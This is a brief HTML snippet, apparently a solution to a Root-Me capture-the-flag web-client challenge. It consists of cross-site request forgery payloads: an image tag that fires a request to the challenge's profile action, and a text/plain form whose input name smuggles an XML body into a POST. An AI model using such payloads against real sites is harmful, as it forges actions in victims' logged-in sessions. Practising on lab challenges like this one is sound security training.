<html><p>XMCO PARTNERS :<img src="http://challenge01.root-me.org/web-client/ch22/?action=profile" /></p></html>
<form action=”http://challenge01.root-me.org/web-client/ch22/?action=profile”       method=”POST” enctype=”text/plain”><input name=”<msg><attr><name>a</name><value>b</value></attr></msg>” value=””><input type=”submit”></form>